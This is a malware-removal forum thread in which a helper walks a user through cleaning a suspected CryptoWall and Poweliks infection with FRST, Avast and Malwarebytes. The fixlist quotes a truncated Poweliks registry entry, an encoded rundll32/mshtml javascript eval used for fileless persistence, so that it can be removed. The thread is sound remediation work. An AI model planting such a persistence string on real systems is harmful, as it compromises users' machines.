My computer was acting strangely over the weekend, with Avast alerting me to something that was trying to open a malicious web site every few minutes. I also found some processes running (dllhost.exe*32 - COM Surrogate) that I didn’t recognize, and they regenerated each time I killed them. I’ve tried Boottime scans with Avast and Malwarebytes, but the problem is still with me.
I’ve downloaded and run the programs you usually advise and attached the log files below.
Looking forward to your help.
Jim
If CryptoWall is on your computer, your files should be encrypted. Is that so? You should also have a Police Page opening on bootup OR everytime you open a webpage… Can you confirm that aswell?
Here’s the log file from the most recent run of FRST64, and thanks for your help.
Oh, one last thing. I really don’t care at all about the encrypted files that I’m going to lose. There really isn’t anything of value on this computer. It’s used solely for online gaming. No important docs, images, movies, no attached storage, and no links to cloud storage. My goal is to ensure that they can’t be back into the computer again, not to recover the files.
My Apologies. I’ve been very tied up with a project at work and practically living there. No time to put in to this computer till today.
The problem is still with me. Avast still reports that it’s repeatedly blocking malicious web sites. Is there a next step that I can take?
Could you manually delete the following folder please as my tools cannot handle the coding
C:\Users\Kathy-\AppData\Roaming\麽鎒駓覜
Also could you post the additions txt that was generated
CAUTION : This fix is only valid for this specific machine, using it on another may break your computer
Open notepad and copy/paste the text in the quotebox below into it:
HKU\S-1-5-21-1699977870-1126029260-2032547726-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No File
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: ipconfig /flushdns
CMD: netsh winsock reset catalog
CMD: netsh int ip reset c:\resetlog.txt
CMD: ipconfig /release
CMD: ipconfig /renew
Save this as fixlist.txt, in the same location as FRST.exe
Run FRST and press Fix
On completion a log will be generated please post that
WARNING:Java is the #1 exploited program at this time. The Department of Homeland Security recommends that computer users disable Java
See this article
I would recommend that you completely uninstall Java unless you need it to run an important software.
In that instance I would recommend that you disableJava in your browsers until you need it for that software and then enable it. (See How to diasble Java in your web browser and How to unplug Java from the browser)
Now that you are clean, to help protect your computer in the future I recommend that you get the following free programmes:
CryptoPrevent install this programme to lock down and prevent crypto ransome ware